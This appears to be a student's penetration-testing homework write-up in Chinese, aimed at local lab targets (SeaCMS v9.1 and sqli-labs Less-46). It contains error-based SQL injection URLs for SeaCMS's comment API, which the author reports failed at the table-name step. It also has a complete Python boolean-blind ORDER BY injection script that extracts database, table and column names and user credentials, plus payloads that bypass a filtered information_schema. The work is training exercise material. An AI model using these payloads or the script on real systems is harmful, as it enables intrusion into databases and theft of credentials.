渗透第二次作业
1、seacmsv9报错注入出管理员账号密码
注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php
注入点:&$rlist
经源代码分析,可用以下语句注入,得到用户名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`
用以下语句注入出数据库名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`
用以下语句注入出表名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`
结果注入失败
2、orderby的布尔盲注
布尔盲注:
import requests
from lxml import html
def get_id_one(URL, paload):
res = requests.get(url=URL, params=paload)
tree = html.fromstring(res.content)
id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
return id_one
# 获取数据库名
def database(URL):
dataname = ""
for i in range(1, 10):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
hight = mid
mid = (low + hight) // 2
else:
low = mid + 1
mid = (low + hight) // 2
dataname += chr(mid)
print(dataname)
# 获取表名
def table_name(URL):
tables = ""
for i in range(1, 40):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
tables += chr(mid)
print(tables)
# 获取字段名
def column_name(URL):
columns = ""
for i in range(1, 25):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
columns += chr(mid)
print(columns)
# 获取数据
def datas(URl):
data = ""
for i in range(1, 50):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
data += chr(mid)
print(data)
if __name__ == '__main__':
URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"
database(URL)
table_name(URL)
column_name(URL)
datas(URL)结果:
3、过滤information_schema,如何解决
如果information_schema被过滤掉了,该如何查询数据
方法一:利用sys数据库
查看所有数据库名:
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;
查看数据库中所有表名:
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';
#sys.schema_auto_increment_columns
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_table_index
#均可代替 information_schema
方法二:无列名注入
利用 join-using 注列名
获取表名:
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
获取字段名:
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+